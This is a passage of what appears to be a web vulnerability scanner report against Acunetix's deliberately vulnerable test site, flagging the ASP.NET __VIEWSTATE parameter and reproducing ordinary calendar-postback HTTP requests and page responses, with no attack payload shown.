style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1183 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,183 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8279&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCA1Omsi9oIZGRkxLX89XDHYaZ%2F2Ja3%2FuiYGPrp0F0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLdptaiCQLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAqiSrUvVjyjaFmblmwNwqatOXrWM
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:50:41 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCA1Omsi9oIZGRkxLX89XDHYaZ/2Ja3/uiYGPrp0F0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLdptaiCQLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAqiSrUvVjyjaFmblmwNwqatOXrWM" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:White" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1147 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,147 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8295&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCAcJA%2FmNoIZGRkCOeeHbiO8XMsB13vHazfj6j4YSk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLyxLxyAu2JnvwLAseQjP4OAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DAr%2BTz8IMAr%2BTz8IMApC62esPApC62esPApC6zY4HApC6zY4HApC64SUCkLrhJQKQupX4CQKQupX4CQKQuomfAQKQuomfAQKQur2yCgKQur2yCgKQutHWAwKQutHWAwKQusXtDAKQusXtDAKQurnVCQKQurnVCQKQuq3oAgKQuq3oAgLX2eyeBwLX2eyeBwLX2YA1AtfZgDUC19m0yAkC19m0yAkC19mo7wIC19mo7wIC19ncgwoC19ncgwoC19nwpgMC19nwpgMC19nk%2FQwC19nk%2FQwC19mYkAQC19mYkAQC19nM%2BQIC19nM%2BQIC19ngnAoC19ngnAoCqODyhQ0CqODyhQ0CqODm2AYCqODm2AYCqOCa%2Fw8CqOCa%2Fw8CqOCOkgcCqOCOkgcCqOCiKQKo4KIpAqjg1s0JAqjg1s0JAqjgyuACAqjgyuACVNehln4mn%2B7sbfCRrhtNky52ApY%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:35:12 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCAcJA/mNoIZGRkCOeeHbiO8XMsB13vHazfj6j4YSk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyxLxyAu2JnvwLAseQjP4OAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DAr+Tz8IMAr+Tz8IMApC62esPApC62esPApC6zY4HApC6zY4HApC64SUCkLrhJQKQupX4CQKQupX4CQKQuomfAQKQuomfAQKQur2yCgKQur2yCgKQutHWAwKQutHWAwKQusXtDAKQusXtDAKQurnVCQKQurnVCQKQuq3oAgKQuq3oAgLX2eyeBwLX2eyeBwLX2YA1AtfZgDUC19m0yAkC19m0yAkC19mo7wIC19mo7wIC19ncgwoC19ncgwoC19nwpgMC19nwpgMC19nk/QwC19nk/QwC19mYkAQC19mYkAQC19nM+QIC19nM+QIC19ngnAoC19ngnAoCqODyhQ0CqODyhQ0CqODm2AYCqODm2AYCqOCa/w8CqOCa/w8CqOCOkgcCqOCOkgcCqOCiKQKo4KIpAqjg1s0JAqjg1s0JAqjgyuACAqjgyuACVNehln4mn+7sbfCRrhtNky52ApY=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:White" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" 